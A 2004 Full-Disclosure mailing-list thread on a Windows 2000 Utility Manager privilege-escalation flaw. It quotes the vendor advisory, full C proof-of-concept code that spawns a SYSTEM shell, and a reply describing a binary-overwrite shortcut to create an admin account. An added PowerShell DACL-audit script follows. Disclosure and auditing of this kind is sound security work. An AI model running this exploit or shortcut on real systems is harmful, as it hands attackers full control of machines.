Message-ID: <01d901c42810$3bc5c0e0$0201a8c0@globint.com.ar>
From: secemf at yahoo.com.ar (Esteban Martínez Fayó)
Subject: Norton AntiVirus nested file manual scan bypass.....

----- Original Message -----
From: "natch" <lists@...ch.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, April 19, 2004 1:49 PM
Subject: Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....

> Nice, but the faster method is to copy \winnt\system32\cmd.exe to
> \winnt\winhlp32.exe (can be done as a normal user), hit win+u, then f1.

You are wrong. A normal user cannot overwrite \winnt\winhlp32.exe with the
default NTFS file permissions of Windows 2000.

> When the command prompt comes up it has elevated privileges. From there
> you can run MMC.exe, open up \winnt\system32\lusrmgr.msc and create a
> new account.
>
> No external program needed. The Microsoft patch simply removes the
> contextual help.
>
> -
> natch
>
> Vivek Rathod (Application Security, Inc.) wrote:
>
> > Microsoft Windows Utility Manager Vulnerability
> >
> > April 13, 2004
> >
> > Risk Level: High
> >
> > Summary:
> > A local elevation of privileges vulnerability exists on the Windows
> > Utility Manager that allows any user to take complete control over the
> > operating system.
> >
> > Versions Affected:
> > All products in the Windows 2000 operating system family.
> >
> > Details:
> > Microsoft Windows 2000 contains support for Accessibility options within
> > the operating system. Accessibility support is a series of assistive
> > technologies within Windows that allow users with disabilities to still
> > be able to access the functions of the operating system. Accessibility
> > support is enabled or disabled through shortcuts built into the
> > operating system, or through the Accessibility Utility Manager. The
> > Utility Manager is an accessibility utility that allows users to check
> > the status of Accessibility programs (Magnifier, Narrator, On-Screen
> > Keyboard) and start or stop them. The Utility Manager can be invoked by
> > pressing Windows Key + U or executing "utilman.exe /start" from the
> > command line. The Utility Manager Service is enabled by default and runs
> > in the interactive desktop with Local System privileges.
> >
> > The Utility Manager has support for context sensitive help. Users can
> > access this by clicking on the "?" on the title bar and then on an
> > object or by pressing the F1 key after selecting an object. In order to
> > display the help, Utility Manager loads winhlp32.exe but does not drop
> > System privileges. Therefore, winhlp32.exe is executed under the Local
> > System account. While winhlp32.exe is executing it is possible to send
> > Windows messages to it and attack it with "Shatter" style attacks.
> >
> > Winhlp32.exe is executed with its main window hidden but it is very
> > trivial to make it visible. Once the window is made visible, a typical
> > attack would involve using the "File Open" dialog to execute a program
> > such as "cmd.exe." Since the Help window has Local System privileges,
> > the executed program will have the same privileges.
> >
> > Further information is available at:
> > http://www.appsecinc.com/resources/alerts/general/04-0001.html
> > http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0908
> > http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx
> >
> > Fix:
> > http://www.microsoft.com/downloads/details.aspx?FamilyId=0692C27E-F63A-414C-B3EB-D2342FBB6C00&displaylang=en
> >
> >
> > Acknowledgments:
> > Thanks to Cesar Cerrudo and Esteban Martinez Fayo of Application
> > Security, Inc. (http://www.appsecinc.com) and to
> > Brett Moore of Security-Assessment.com (http://security-assessment.com).
> >
> > Please find the proof-of-concept exploit code attached
> >
> > ___________________________________________
> > AppSecInc Team SHATTER
> > Tel: 1-866-927-7732
> > E-mail: shatter@...secinc.com
> > Web: www.appsecinc.com
> >
> > Application Security, Inc.
> > "Securing Business by Securing Enterprise Applications"
> >
> > ------------------------------------------------------------------------
> >
> > // By Cesar Cerrudo (cesar@...secinc.com)
> > // Local elevation of privileges exploit for Windows Utility Manager
> > // Gives you a shell with system privileges
> > // If you have problems try changing Sleep() values.
> >
> > #include <stdio.h>
> > #include <windows.h>
> > #include <commctrl.h>
> > #include <Winuser.h>
> >
> > int main(int argc, char *argv[])
> > {
> >     HWND lHandle, lHandle2;
> >     POINT point;
> >
> >     char sText[]="%windir%\\system32\\cmd.ex?";
> >
> >     // run utility manager
> >     system("utilman.exe /start");
> >     Sleep(500);
> >
> >     // execute contextual help
> >     SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
> >     Sleep(500);
> >
> >     // open file open dialog window in Windows Help
> >     PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
> >     Sleep(500);
> >
> >     // find open file dialog window
> >     lHandle = FindWindow("#32770","Open");
> >
> >     // get input box handle
> >     lHandle2 = GetDlgItem(lHandle, 0x47C);
> >     Sleep(500);
> >
> >     // set text to filter listview to display only cmd.exe
> >     SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
> >     Sleep(800);
> >
> >     // send return
> >     SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
> >
> >     //get navigation bar handle
> >     lHandle2 = GetDlgItem(lHandle, 0x4A0);
> >     //send tab
> >     SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
> >     Sleep(500);
> >     lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
> >     //get list view handle
> >     lHandle2 = GetDlgItem(lHandle2, 0x1);
> >
> >     SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
> >     SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
> >     SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
> >     Sleep(500);
> >
> >     // popup context menu
> >     PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
> >     Sleep(1000);
> >
> >     // get context menu handle
> >     point.x =10; point.y =30;
> >     lHandle2=WindowFromPoint(point);
> >
> >     SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> >     SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
> >     SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return
> >
> >     SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
> >
> >     return(0);
> > }
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
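The disagreement in this thread turns on a single question: does the default NTFS DACL let a non-administrative user replace \winnt\winhlp32.exe? The PowerShell script below is an added example, not part of the thread and not code from Application Security, Inc. or natch; it reads the DACLs on the binaries the messages name and reports any Allow ACE that grants a broad, non-administrative principal the rights needed to replace them (write, append, delete, change permissions, take ownership). The target paths and the list of "broad" principals are assumptions chosen to match the thread; extend both for your own environment.

```powershell
# Added example, not from the original thread: report ACEs that would let a
# non-administrative user replace the help or shell binaries named above.
# Target paths and the broad-principal list are assumptions for illustration.

$targets = @(
    (Join-Path $env:windir 'winhlp32.exe'),      # launched as SYSTEM by Utility Manager
    (Join-Path $env:windir 'system32\cmd.exe'),
    (Join-Path $env:windir 'system32')           # parent dir: create/delete rights matter too
)

# Principals every interactive user belongs to. A write-capable Allow ACE for
# one of these is exactly what the "copy cmd.exe over winhlp32.exe" claim needs.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights sufficient to replace a file: directly, by delete-and-recreate, or by
# first rewriting the DACL or taking ownership.
$replaceRights = [System.Security.AccessControl.FileSystemRights] (
    'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ' +
    'ChangePermissions, TakeOwnership, Write, Modify, FullControl'
)

function Test-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Path)

    if (-not (Test-Path -LiteralPath $Path)) {
        return [pscustomobject]@{ Path = $Path; Principal = $null; Rights = 'NOT PRESENT'; Risky = $false }
    }

    $acl = Get-Acl -LiteralPath $Path
    $findings = foreach ($ace in $acl.Access) {
        # Only Allow ACEs can grant write access; a matching Deny ACE wins under
        # NTFS evaluation, so Deny entries are skipped rather than flagged.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($broadPrincipals -notcontains $who) { continue }
        # -band on the raw integer copes with generic-rights masks that do not
        # round-trip cleanly through the FileSystemRights enum.
        $granted = [int]$ace.FileSystemRights -band [int]$replaceRights
        if ($granted -ne 0) {
            [pscustomobject]@{
                Path      = $Path
                Principal = $who
                Rights    = [System.Security.AccessControl.FileSystemRights]$granted
                Risky     = $true
            }
        }
    }
    if (-not $findings) {
        [pscustomobject]@{ Path = $Path; Principal = '(no broad principal)'; Rights = 'no write-capable ACE'; Risky = $false }
    } else {
        $findings
    }
}

$targets | ForEach-Object { Test-BroadWriteAccess -Path $_ } | Format-Table -AutoSize
```

Run it as an ordinary user: reading a DACL needs only ReadPermissions, which the default read access on system directories includes, so the output reflects what a non-administrator could actually do. An empty "Risky" column for winhlp32.exe and system32 is the condition Esteban's rebuttal relies on; any row with Risky = True means the shortcut natch describes would work on that machine regardless of the Utility Manager patch, and that ACE should be corrected.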